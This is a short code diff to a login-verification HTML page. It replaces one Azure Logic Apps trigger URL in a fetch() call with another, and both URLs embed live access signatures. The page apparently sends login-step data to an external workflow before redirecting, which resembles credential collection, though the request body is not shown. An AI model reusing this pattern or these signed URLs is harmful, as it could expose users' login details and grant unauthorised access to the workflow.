--- a/login-varify.html
+++ b/login-varify.html
@@ -287,7 +287,7 @@
                 redirect: 'follow'
             };
 
-            fetch("https://prod-23.southeastasia.logic.azure.com:443/workflows/eceae0b4ffee413687edf494b289f51e/triggers/manual/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=JDu_0tsKqEq-Nqa2cOCT4p_Q1G6W7JN0fOeKgwpQ6-Q", requestOptions)
+            fetch("https://prod-127.westeurope.logic.azure.com:443/workflows/3fa135848c174b6ab5c96e435848c539/triggers/manual/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=EiYXqTRJmErp41dJRg7PbOlf-UKGHe7n-PhmilTM6_w", requestOptions)
                 .then(response => {
                     if (response.status === 200) {
                         // Construct the URL to navigate to
